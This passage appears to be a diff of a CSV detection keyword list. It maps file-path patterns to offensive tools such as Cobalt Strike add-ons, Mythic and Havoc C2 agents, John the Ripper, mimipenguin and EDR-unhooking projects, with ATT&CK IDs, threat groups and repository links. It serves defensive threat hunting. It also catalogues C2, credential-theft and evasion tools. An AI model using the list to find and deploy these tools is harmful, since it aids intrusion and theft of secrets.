As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/outflank_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/outflank_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/outflanknl/*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/output/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/output/ratchatPT*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" 
@@ -4635,9 +4678,9 @@
 "*/p292/Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z"
 "*/p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/package/portscan/*.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
-"*/PackMyPayload.git*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
-"*/PackMyPayload/*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
-"*/pacu.git*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/PackMyPayload.git*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
+"*/PackMyPayload/*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
+"*/pacu.git*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
 "*/padre/pkg/exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z"
 "*/paensy.cpp*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z"
 "*/papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z"
@@ -4647,61 +4690,63 @@ "*/parrot-on-docker/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrotsec/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*/pass_gen.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/PassDetective.git*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 
- T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*/parsers/nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/pass_gen.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/PassDetective.git*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "*/passhash.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*/passive_sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/passwd_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" -"*/password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/passwd_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/password/mimipenguin/*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/password_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/patchfinder64.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" -"*/PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/patchfinder64.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/path_traversal.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" "*/path_traversal_win32.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" "*/path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/payload_scripts*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/payload_scripts/artifact*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*/payload_service.sh*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Payload_Type/athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Payload_Types/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*/payload_service.sh*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Type/athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Types/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*/payload2.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*/payloads/DllLdr/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/payloads/payloads.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
